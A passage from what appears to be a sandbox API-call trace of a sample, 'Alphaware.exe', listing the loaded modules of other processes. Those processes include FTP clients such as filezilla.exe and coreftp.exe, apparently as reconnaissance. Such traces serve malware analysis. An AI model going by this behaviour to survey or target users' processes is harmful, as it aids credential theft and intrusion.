nSize=0x800 | out: lpBaseName="d3d10_1.dll") returned 0xb [0051.683] CoTaskMemFree (pv=0x782320) [0051.683] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.683] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefaec0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")) returned 0x1f [0051.685] CoTaskMemFree (pv=0x782320) [0051.685] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefae60000, lpmodinfo=0x24db208, cb=0x18 | out: lpmodinfo=0x24db208*(lpBaseOfDll=0x7fefae60000, SizeOfImage=0x55000, EntryPoint=0x7fefae96b20)) returned 1 [0051.686] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.686] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefae60000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="d3d10_1core.dll") returned 0xf [0051.688] CoTaskMemFree (pv=0x782320) [0051.688] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.688] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefae60000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")) returned 0x23 [0051.689] CoTaskMemFree (pv=0x782320) [0051.689] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefadb0000, lpmodinfo=0x24dd3d8, cb=0x18 | out: lpmodinfo=0x24dd3d8*(lpBaseOfDll=0x7fefadb0000, SizeOfImage=0xa7000, EntryPoint=0x7fefadc050c)) returned 1 [0051.691] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.691] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefadb0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dxgi.dll") returned 0x8 [0051.693] CoTaskMemFree (pv=0x782320) [0051.693] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.693] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefadb0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")) returned 0x1c [0051.695] CoTaskMemFree (pv=0x782320) [0051.695] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x24df598, cb=0x18 | out: lpmodinfo=0x24df598*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0051.697] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.697] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0051.699] CoTaskMemFree (pv=0x782320) [0051.699] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.699] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0051.701] CoTaskMemFree (pv=0x782320) [0051.701] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbca0000, lpmodinfo=0x24e1758, cb=0x18 | out: lpmodinfo=0x24e1758*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0051.702] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.703] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbca0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0051.704] CoTaskMemFree (pv=0x782320) [0051.704] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.704] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbca0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0051.706] CoTaskMemFree (pv=0x782320) [0051.706] GetModuleInformation (in: hProcess=0x218, hModule=0x779f0000, lpmodinfo=0x24e3918, cb=0x18 | out: lpmodinfo=0x24e3918*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0051.708] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.708] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x779f0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="PSAPI.DLL") returned 0x9 [0051.710] CoTaskMemFree (pv=0x782320) [0051.710] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.710] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x779f0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PSAPI.DLL" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0051.712] CoTaskMemFree (pv=0x782320) [0051.712] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x24e5ad8, cb=0x18 | out: lpmodinfo=0x24e5ad8*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0051.714] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.714] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0051.716] CoTaskMemFree (pv=0x782320) [0051.716] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.716] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0051.718] CoTaskMemFree (pv=0x782320) [0051.718] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x24e7ca8, cb=0x18 | out: lpmodinfo=0x24e7ca8*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0051.720] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.720] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0051.722] CoTaskMemFree (pv=0x782320) [0051.722] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.722] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0051.724] CoTaskMemFree (pv=0x782320) [0051.724] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x24e9e68, cb=0x18 | out: lpmodinfo=0x24e9e68*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0051.726] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.726] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0051.728] CoTaskMemFree (pv=0x782320) [0051.728] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.728] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0051.730] CoTaskMemFree (pv=0x782320) [0051.730] CloseHandle (hObject=0x218) returned 1 [0051.735] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.736] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb50) returned 0x218 [0051.736] EnumProcessModules (in: hProcess=0x218, lphModule=0x24ecd10, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24ecd10, lpcbNeeded=0x41eb20) returned 1 [0051.736] GetModuleInformation (in: hProcess=0x218, hModule=0x120000, lpmodinfo=0x24ecf80, cb=0x18 | out: lpmodinfo=0x24ecf80*(lpBaseOfDll=0x120000, SizeOfImage=0x17000, EntryPoint=0x1214a1)) returned 1 [0051.737] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.737] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x120000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="filezilla.exe") returned 0xd [0051.737] CoTaskMemFree (pv=0x782320) [0051.737] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.737] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x120000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows NT\\filezilla.exe" (normalized: "c:\\program files (x86)\\windows nt\\filezilla.exe")) returned 0x2f [0051.738] CoTaskMemFree (pv=0x782320) [0051.738] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24ef1a0, cb=0x18 | out: lpmodinfo=0x24ef1a0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.738] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.738] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.739] CoTaskMemFree (pv=0x782320) [0051.739] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.739] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.740] CoTaskMemFree (pv=0x782320) [0051.740] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24f1360, cb=0x18 | out: lpmodinfo=0x24f1360*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.740] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.740] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.741] CoTaskMemFree (pv=0x782320) [0051.741] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.741] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.741] CoTaskMemFree (pv=0x782320) [0051.741] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24f3520, cb=0x18 | out: lpmodinfo=0x24f3520*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.742] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.742] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.742] CoTaskMemFree (pv=0x782320) [0051.742] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.743] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.743] CoTaskMemFree (pv=0x782320) [0051.743] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24f56f0, cb=0x18 | out: lpmodinfo=0x24f56f0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.744] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.744] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.744] CoTaskMemFree (pv=0x782320) [0051.745] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.745] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.745] CoTaskMemFree (pv=0x782320) [0051.745] CloseHandle (hObject=0x218) returned 1 [0051.747] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.747] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x218 [0051.747] EnumProcessModules (in: hProcess=0x218, lphModule=0x24f7e00, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x24f7e00, lpcbNeeded=0x41eb20) returned 1 [0051.747] GetModuleInformation (in: hProcess=0x218, hModule=0xb00000, lpmodinfo=0x24f8070, cb=0x18 | out: lpmodinfo=0x24f8070*(lpBaseOfDll=0xb00000, SizeOfImage=0x17000, EntryPoint=0xb014a1)) returned 1 [0051.749] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.749] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xb00000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="analysis-source.exe") returned 0x13 [0051.749] CoTaskMemFree (pv=0x782320) [0051.750] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.750] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xb00000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\analysis-source.exe" (normalized: "c:\\program files\\windowspowershell\\analysis-source.exe")) returned 0x36 [0051.750] CoTaskMemFree (pv=0x782320) [0051.750] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24fa2c0, cb=0x18 | out: lpmodinfo=0x24fa2c0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.751] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.751] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.751] CoTaskMemFree (pv=0x782320) [0051.751] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.751] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.752] CoTaskMemFree (pv=0x782320) [0051.752] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24fc480, cb=0x18 | out: lpmodinfo=0x24fc480*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.752] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.752] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.753] CoTaskMemFree (pv=0x782320) [0051.753] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.753] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.753] CoTaskMemFree (pv=0x782320) [0051.754] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24fe640, cb=0x18 | out: lpmodinfo=0x24fe640*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.754] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.754] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.755] CoTaskMemFree (pv=0x782320) [0051.755] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.755] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.755] CoTaskMemFree (pv=0x782320) [0051.755] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2500810, cb=0x18 | out: lpmodinfo=0x2500810*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.756] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.756] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.757] CoTaskMemFree (pv=0x782320) [0051.757] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.757] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.758] CoTaskMemFree (pv=0x782320) [0051.758] CloseHandle (hObject=0x218) returned 1 [0051.759] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.759] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x218 [0051.759] EnumProcessModules (in: hProcess=0x218, lphModule=0x2502f20, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2502f20, lpcbNeeded=0x41eb20) returned 1 [0051.760] GetModuleInformation (in: hProcess=0x218, hModule=0x1160000, lpmodinfo=0x2503190, cb=0x18 | out: lpmodinfo=0x2503190*(lpBaseOfDll=0x1160000, SizeOfImage=0x17000, EntryPoint=0x11614a1)) returned 1 [0051.760] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.760] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x1160000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="far.exe") returned 0x7 [0051.761] CoTaskMemFree (pv=0x782320) [0051.761] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.761] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x1160000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Mail\\far.exe" (normalized: "c:\\program files\\windows mail\\far.exe")) returned 0x25 [0051.762] CoTaskMemFree (pv=0x782320) [0051.762] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2505390, cb=0x18 | out: lpmodinfo=0x2505390*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.762] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.762] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.763] CoTaskMemFree (pv=0x782320) [0051.763] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.763] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.764] CoTaskMemFree (pv=0x782320) [0051.764] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2507550, cb=0x18 | out: lpmodinfo=0x2507550*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.764] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.764] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.765] CoTaskMemFree (pv=0x782320) [0051.765] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.765] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.765] CoTaskMemFree (pv=0x782320) [0051.765] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2509710, cb=0x18 | out: lpmodinfo=0x2509710*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.766] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.766] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.767] CoTaskMemFree (pv=0x782320) [0051.767] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.767] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.767] CoTaskMemFree (pv=0x782320) [0051.767] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x250b8e0, cb=0x18 | out: lpmodinfo=0x250b8e0*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.768] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.768] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.769] CoTaskMemFree (pv=0x782320) [0051.769] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.769] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.769] CoTaskMemFree (pv=0x782320) [0051.769] CloseHandle (hObject=0x218) returned 1 [0051.771] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.771] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x218 [0051.771] EnumProcessModules (in: hProcess=0x218, lphModule=0x250e008, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x250e008, lpcbNeeded=0x41eb20) returned 1 [0051.772] GetModuleInformation (in: hProcess=0x218, hModule=0x340000, lpmodinfo=0x250e278, cb=0x18 | out: lpmodinfo=0x250e278*(lpBaseOfDll=0x340000, SizeOfImage=0x17000, EntryPoint=0x3414a1)) returned 1 [0051.772] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.772] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x340000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="miss-single-speech.exe") returned 0x16 [0051.773] CoTaskMemFree (pv=0x782320) [0051.773] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.773] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x340000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Portable Devices\\miss-single-speech.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\miss-single-speech.exe")) returned 0x46 [0051.773] CoTaskMemFree (pv=0x782320) [0051.773] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x25104d8, cb=0x18 | out: lpmodinfo=0x25104d8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0051.774] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.774] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0051.774] CoTaskMemFree (pv=0x782320) [0051.774] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.774] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0051.775] CoTaskMemFree (pv=0x782320) [0051.775] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2512698, cb=0x18 | out: lpmodinfo=0x2512698*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0051.775] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.775] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0051.776] CoTaskMemFree (pv=0x782320) [0051.776] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.776] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0051.777] CoTaskMemFree (pv=0x782320) [0051.777] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2514858, cb=0x18 | out: lpmodinfo=0x2514858*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0051.777] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.777] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0051.778] CoTaskMemFree (pv=0x782320) [0051.778] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.778] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0051.779] CoTaskMemFree (pv=0x782320) [0051.779] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2516a28, cb=0x18 | out: lpmodinfo=0x2516a28*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0051.783] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.783] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0051.784] CoTaskMemFree (pv=0x782320) [0051.784] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.784] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x782320, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0051.785] CoTaskMemFree (pv=0x782320) [0051.785] CloseHandle (hObject=0x218) returned 1 [0051.787] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", nBufferLength=0x105, lpBuffer=0x41e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe", lpFilePart=0x0) returned 0x28 [0051.787] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb40) returned 0x218 [0051.787] EnumProcessModules (in: hProcess=0x218, lphModule=0x2519138, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2519138, lpcbNeeded=0x41eb20) returned 1 [0051.787] GetModuleInformation (in: hProcess=0x218, hModule=0xaa0000, lpmodinfo=0x25193a8, cb=0x18 | out: lpmodinfo=0x25193a8*(lpBaseOfDll=0xaa0000, SizeOfImage=0x17000, EntryPoint=0xaa14a1)) returned 1 [0051.788] CoTaskMemAlloc (cb=0x804) returned 0x782320 [0051.788] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xaa0000, lpBaseName=0x782320, nSize=0x800 | out: lpBaseName="coreftp.exe") returned 0xb [0051.788] CoTaskMemFree (pv=0x782320) [0051.788] CoTaskMemAlloc 